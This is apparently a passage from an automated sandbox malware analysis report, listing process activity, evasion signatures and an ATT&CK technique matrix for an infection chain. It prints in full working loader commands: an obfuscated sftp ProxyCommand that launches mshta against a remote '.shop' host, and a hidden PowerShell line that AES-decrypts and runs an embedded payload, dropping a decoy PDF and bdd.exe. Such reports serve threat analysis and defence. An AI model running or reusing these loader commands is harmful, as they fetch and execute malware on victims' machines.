Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1703Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1054Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1319Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 468Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4662Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5122Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7520Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7520Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep count: 1703 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep count: 1054 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5940Thread sleep count: 1319 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep count: 468 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 892Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6128Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000009.00000002.1939086119.000002224B711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
Source: mshta.exe, 00000006.00000002.1972320693.0000021125880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000006.00000003.1957853761.0000020922C9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970382739.0000020922C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: mshta.exe, 00000006.00000003.1964217583.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1967165870.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1957763371.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970541609.0000020922D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2614249310.00000140DD82A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2615849875.00000140E2E54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: sftp.exe, 00000000.00000002.1976792584.000002B032209000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000003.00000002.1976086405.000001A552749000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Roaming\bdd.exeNtQuerySystemInformation: Indirect: 0x4AB00CJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeNtQuerySystemInformation: Direct from: 0x2E8Jump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeNtQuerySystemInformation: Indirect: 0x4AAF3EJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeNtAllocateVirtualMemory: Direct from: 0x7FF84184DC6BJump to behavior
Source: C:\Windows\System32\OpenSSH\sftp.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftpJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://static.klipxuhaq.shop/BUX6P.mp4"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Mcyga.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\bdd.exe "C:\Users\user\AppData\Roaming\bdd.exe" Jump to behavior
Source: unknownProcess created: C:\Windows\System32\OpenSSH\sftp.exe "c:\windows\system32\openssh\sftp.exe" -o proxycommand="powershell powershell -command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/bu]]]x6p]]]].mp4]]' -replace ']')" .
Source: C:\Windows\System32\OpenSSH\sftp.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" "-oforwardx11 no" "-oforwardagent no" "-opermitlocalcommand no" "-oclearallforwardings yes" -o "proxycommand=powershell powershell -command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/bu]]]x6p]]]].mp4]]' -replace ']')" "-oprotocol 2" -s -- . sftp
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function albv($auxrs){return -split ($auxrs -replace '..', '0x$& ')};$jqlq = albv('a2c48681d2459656e4692303b9bc7cff6e08a10a018431979198d25a52f894f6dc443732b0c3354905be975423f38084d2727cbf0dac9b616709f076910568402e1b28ef5d32b51c2ac725a34041cb2c720ac989db2e62000fd988905e1a6389fb0d52e37d7c2115dd226b708311260031e5fe6bc8bc5e87908c3714aabd2f115c12d362819a4e916feed235a129fbf323d36de4ad902e8c8a51a233d5853e42f28657de3ed15211bfe6941dbd1c7f025630974368a83fd5de963ef1e91efd56dbfa68ad8063783d6639f87d1fe6bfd099bbe5a6d9601ef7ec17fda43d8ae527d0296119ad7ebf32fd111a12dbb01041deb9bad02400a8b21a164e61a0c5eebf6eba6731a52636245a483b65ef09c62369bf5f6779155aff4ae3c49130512d33c4a447294185b0af3f2dc5bfd7040c32f45793ca424e8dc070d428b1e88ae756b7d81c20e90e56a70c92c46b646db06d5d809f597fcb0b2a835686434f9b8ee1346022a7e67a5ff1e93282dd685ddba750b164855122cfe1595d8d4c626ccdc95d069d378f11d1d01cee44578bb248b707df3936ce1150d5a850e2c59d2b6ea91d541c5fa289284f984d5ef5f1bbae1c95e6cd4d479d18168f4f5a1f6a3d2516c97548490fe4ede1e8fbd46026bf7c44f92b74e23bff805094490db237a8fba52231fa45c8d0cade12ce630f42ad7d6c814eac9911b70168a211c18f648329e6e5d0e31f6a222ba929c78e74d5a726ab7bd0489d0e553eaa929c4c481cf50df1b3a85b394d77767c3d76038df4ef9df6ddcf5254204467b039593f4a73aa3964076f9237db55dc43bae2e0a12466d7f7ba453418aa783574d20bd5a3ed874800b10605deaa6fc471ab3b4a8822c688a244da7a4cb28555df5ffd93045a4154386bdc999322dc1d7dad002e13c7b2273236812a6e335c1646d87460f8997e340c4ef0b462c6f9e2a290fd703294de51c6349ec9da9ced11400f78ccffa21f2b7a01319f1af67bd8795b27f817e01a0ee0045366397548b1c18343e85d61f0e81f6554e60f30c03986021e0b29eebacfd5a055f6a04bde3fb67d9f1bbf0c59cd41d646ff685434e25b463effb769528bee');$pupw=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((albv('45625942537170514679715a53476565')),[byte[]]::new(16)).transformfinalblock($jqlq,0,$jqlq.length)); & $pupw.substring(0,3) $pupw.substring(257)
Source: C:\Windows\System32\OpenSSH\sftp.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" "-oforwardx11 no" "-oforwardagent no" "-opermitlocalcommand no" "-oclearallforwardings yes" -o "proxycommand=powershell powershell -command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/bu]]]x6p]]]].mp4]]' -replace ']')" "-oprotocol 2" -s -- . sftpJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function albv($auxrs){return -split ($auxrs -replace '..', '0x$& ')};$jqlq = albv('a2c48681d2459656e4692303b9bc7cff6e08a10a018431979198d25a52f894f6dc443732b0c3354905be975423f38084d2727cbf0dac9b616709f076910568402e1b28ef5d32b51c2ac725a34041cb2c720ac989db2e62000fd988905e1a6389fb0d52e37d7c2115dd226b708311260031e5fe6bc8bc5e87908c3714aabd2f115c12d362819a4e916feed235a129fbf323d36de4ad902e8c8a51a233d5853e42f28657de3ed15211bfe6941dbd1c7f025630974368a83fd5de963ef1e91efd56dbfa68ad8063783d6639f87d1fe6bfd099bbe5a6d9601ef7ec17fda43d8ae527d0296119ad7ebf32fd111a12dbb01041deb9bad02400a8b21a164e61a0c5eebf6eba6731a52636245a483b65ef09c62369bf5f6779155aff4ae3c49130512d33c4a447294185b0af3f2dc5bfd7040c32f45793ca424e8dc070d428b1e88ae756b7d81c20e90e56a70c92c46b646db06d5d809f597fcb0b2a835686434f9b8ee1346022a7e67a5ff1e93282dd685ddba750b164855122cfe1595d8d4c626ccdc95d069d378f11d1d01cee44578bb248b707df3936ce1150d5a850e2c59d2b6ea91d541c5fa289284f984d5ef5f1bbae1c95e6cd4d479d18168f4f5a1f6a3d2516c97548490fe4ede1e8fbd46026bf7c44f92b74e23bff805094490db237a8fba52231fa45c8d0cade12ce630f42ad7d6c814eac9911b70168a211c18f648329e6e5d0e31f6a222ba929c78e74d5a726ab7bd0489d0e553eaa929c4c481cf50df1b3a85b394d77767c3d76038df4ef9df6ddcf5254204467b039593f4a73aa3964076f9237db55dc43bae2e0a12466d7f7ba453418aa783574d20bd5a3ed874800b10605deaa6fc471ab3b4a8822c688a244da7a4cb28555df5ffd93045a4154386bdc999322dc1d7dad002e13c7b2273236812a6e335c1646d87460f8997e340c4ef0b462c6f9e2a290fd703294de51c6349ec9da9ced11400f78ccffa21f2b7a01319f1af67bd8795b27f817e01a0ee0045366397548b1c18343e85d61f0e81f6554e60f30c03986021e0b29eebacfd5a055f6a04bde3fb67d9f1bbf0c59cd41d646ff685434e25b463effb769528bee');$pupw=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((albv('45625942537170514679715a53476565')),[byte[]]::new(16)).transformfinalblock($jqlq,0,$jqlq.length)); & $pupw.substring(0,3) $pupw.substring(257)Jump to behavior
Source: powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: Shell_TrayWndUser32GetDpiForWindow
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\efd49bff VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenSSH\sftp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
12
Process Injection
11
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Email Collection
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell
Boot or Logon Initialization Scripts1
Abuse Elevation Control Mechanism
31
Virtualization/Sandbox Evasion
LSASS Memory12
Process Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
12
Process Injection
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Multi-hop Proxy
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Abuse Elevation Control Mechanism
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeylogging13
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials23
System Information Discovery
VNCGUI Input Capture1
Proxy
Data Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
